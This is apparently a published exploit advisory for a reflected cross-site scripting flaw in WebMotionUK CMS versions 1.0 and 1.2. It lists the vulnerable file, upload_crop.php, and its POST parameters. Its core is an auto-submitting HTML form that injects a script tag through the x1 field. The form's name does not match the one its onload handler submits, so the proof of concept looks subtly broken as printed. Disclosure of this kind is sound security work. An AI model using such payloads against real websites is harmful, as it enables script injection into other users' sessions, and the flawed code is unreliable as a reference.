# Exploit Title: WebMotionUK CMS Reflected Cross site scripting(xss) Vulnerability # Date: July 25, 2017 # Author: Ashiyane Digital Security Team # Vendor Homepage : http://www.webmotionuk.com/ # Download Link : http://www.webmotionuk.com/php-jquery-image-upload-and-crop/ # Version : Ver 1.2 & Ver 1.0 # CWE : 79 # Category: Web Application # Tested On : Windows 10 / Chrome ______________________ Vulnerability FILE : upload_crop.php ______________________ Vulnerability Method and Variable: POST / x1,x2,y1,y2,w,idp and file_extp ______________________ Vulnerability Path : http://localhost/[PATH]/upload_crop.php ______________________ Vulnerability code and Exploit: <html> <body onload="document.exploit.submit()"> <form name="thumbnail" action="http://localhost/[PATH]/upload_crop.php" method="post"> <input type="hidden" name="x1" value="'/><script>alert(1)</script>" id="x1" /> <input type="hidden" name="y1" value="" id="y1" /> <input type="hidden" name="x2" value="" id="x2" /> <input type="hidden" name="y2" value="" id="y2" /> <h2>Ancho</h2> <input type="text" name="w" value="" id="w" /><br /> <h2>Ancho</h2> <input type="text" name="h" value="" id="h" /><br /> <input type='hidden' name='idp' value=''/> <input type='hidden' name='file_extp' value=''/><br /> </form> </body> </html> _____________________________________ __________ HackFanS __________